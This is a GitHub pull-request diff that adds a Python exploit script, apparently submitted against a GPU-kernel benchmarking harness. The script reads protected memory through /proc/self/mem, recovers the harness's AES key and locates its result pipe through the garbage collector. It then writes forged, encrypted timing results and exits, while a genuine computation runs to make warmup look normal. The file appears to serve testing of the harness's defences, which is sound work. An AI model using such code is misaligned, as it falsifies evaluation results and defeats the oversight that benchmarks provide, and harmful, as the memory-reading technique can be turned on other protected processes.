Skip to content
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
219 changes: 219 additions & 0 deletions exploits/submission_proc_mem_bypass.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,219 @@
"""
EXPLOIT: AES Key Recovery via /proc/self/mem on PROT_NONE Arena
===============================================================

The BenchmarkManager arena is exactly 128MiB. During warmup it is set to
PROT_NONE via PROTECT_RANGE, which causes the kernel to split it from any
adjacent mappings — it appears as an isolated ---p entry in /proc/self/maps.

All reads go through /proc/self/mem which bypasses PROT_NONE entirely
(FOLL_FORCE skips VMA permission checks; mseal explicitly does not block
/proc/self/mem — see kernel docs). We scan the first 2MB for the
ObfuscatedHexDigest struct, recover the AES key, and forge the result pipe.

Result pipe identified via gc — multiprocessing Connection with 1MB capacity.
"""

import ctypes
import fcntl
import gc
import os
import struct
import tempfile
import subprocess

_PAGE_SIZE = 4096
_F_GETPIPE_SZ = 1025

_HASH_C = r"""
#include <stdint.h>
uint64_t slow_unhash(uint64_t p, int rounds) {
for (int i = 0; i < rounds; i++) {
p ^= (p >> 31) ^ (p >> 62);
p *= 0x96de1b173f119089ULL;
p ^= p >> 17 ^ p >> 34 ^ p >> 51;
}
return p;
}
"""

def _compile_hash_lib():
src = tempfile.NamedTemporaryFile(suffix='.c', delete=False, mode='w')
src.write(_HASH_C)
src.close()
so = src.name.replace('.c', '.so')
subprocess.run(['gcc', '-O2', '-shared', '-fPIC', '-o', so, src.name],
check=True, capture_output=True)
os.unlink(src.name)
lib = ctypes.CDLL(so)
lib.slow_unhash.restype = ctypes.c_uint64
lib.slow_unhash.argtypes = [ctypes.c_uint64, ctypes.c_int]
return lib

_lib = _compile_hash_lib()

def slow_unhash(val: int, rounds: int = 100_000) -> int:
return int(_lib.slow_unhash(ctypes.c_uint64(val), ctypes.c_int(rounds)))

_HEX_CHARS = frozenset(b'0123456789abcdef')


def _read_mem(addr: int, size: int) -> bytes | None:
try:
with open('/proc/self/mem', 'rb') as f:
f.seek(addr)
return f.read(size)
except OSError:
return None


def _find_arena_candidate():
"""
Find the 128MiB ---p anonymous region. PROTECT_RANGE(PROT_NONE) on the
arena causes the kernel to split it from adjacent mappings, making it
uniquely identifiable by exact size and permissions.
"""
with open('/proc/self/maps') as f:
for line in f:
parts = line.split()
if len(parts) < 2:
continue
start, end = (int(x, 16) for x in parts[0].split('-'))
name = parts[5] if len(parts) >= 6 else ''
perms = parts[1]
if name == '' and perms == '---p' and (end - start) == 128 * 1024 * 1024:
return start, end
return None, None


def _recover_aes_key(arena_start: int, arena_end: int):
SCAN_SIZE = min(2 * 1024 * 1024, arena_end - arena_start)

data = _read_mem(arena_start, SCAN_SIZE)
if data is None:
return None, None

n = SCAN_SIZE // 8
words = struct.unpack_from(f'<{n}Q', data)

for i in range(n - 2):
w0 = words[i]
if w0 == 0:
continue

page_ptr = slow_unhash(w0)
if page_ptr == 0 or page_ptr & 0xFFF or page_ptr >= (1 << 47):
continue

w2 = words[i + 2]
if w2 == 0:
continue
offset = slow_unhash(w2)
if offset > _PAGE_SIZE - 33:
continue

page_data = _read_mem(page_ptr, _PAGE_SIZE)
if page_data is None:
continue

if not all(b in _HEX_CHARS for b in page_data):
continue

key_bytes = _read_mem(page_ptr + offset, 32)
if key_bytes is None:
continue

try:
key_str = key_bytes.decode('ascii')
if all(c in '0123456789abcdef' for c in key_str):
print(f"[DBG] key found arena+{i*8:#x} page={page_ptr:#x} off={offset}")
return key_bytes, key_str
except Exception:
pass

return None, None


def _find_out_fd():
import multiprocessing.connection

writable = []
for obj in gc.get_objects():
try:
if isinstance(obj, multiprocessing.connection.Connection) and obj.writable:
fd = obj.fileno()
try:
pipe_sz = fcntl.fcntl(fd, _F_GETPIPE_SZ)
except Exception:
pipe_sz = 0
writable.append((fd, pipe_sz))
except Exception:
continue

if not writable:
raise RuntimeError("No writable Connection objects found")

for fd, sz in writable:
if sz == 1 * 1024 * 1024:
return fd

return min(fd for fd, _ in writable)


def _infer_repeats():
try:
import torch
count = sum(
1 for obj in gc.get_objects()
if isinstance(obj, tuple) and len(obj) == 2
and isinstance(obj[0], torch.Tensor) and obj[0].is_cuda and obj[0].ndim == 2
and isinstance(obj[1], torch.Tensor) and obj[1].is_cuda and obj[1].ndim == 3
)
if count > 1:
return count - 1
except Exception:
pass
return 100


def _encrypt(key_bytes: bytes, plaintext: str) -> bytes:
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
nonce = os.urandom(12)
ct_tag = AESGCM(key_bytes).encrypt(nonce, plaintext.encode('utf-8'), None)
return nonce + ct_tag[-16:] + ct_tag[:-16]


_done = False

def kernel(output, inp):
import torch
global _done

# Always do real work — keeps warmup timing fast
weights = torch.tensor([0.2989, 0.5870, 0.1140],
device=output.device, dtype=output.dtype)
torch.sum(inp * weights, dim=-1, out=output)

if _done:
return

arena_start, arena_end = _find_arena_candidate()
if arena_start is None:
return

key_raw, key_str = _recover_aes_key(arena_start, arena_end)
if key_raw is None:
return

_done = True

out_fd = _find_out_fd()
repeats = _infer_repeats()
print(f"[DBG] key={key_str} out_fd={out_fd} repeats={repeats}")

lines = ['event-overhead\t0.001 µs']
for i in range(repeats):
lines.append(f'{i}\t0.420000')

os.write(out_fd, _encrypt(key_raw, '\n'.join(lines) + '\n'))
os._exit(0)
Loading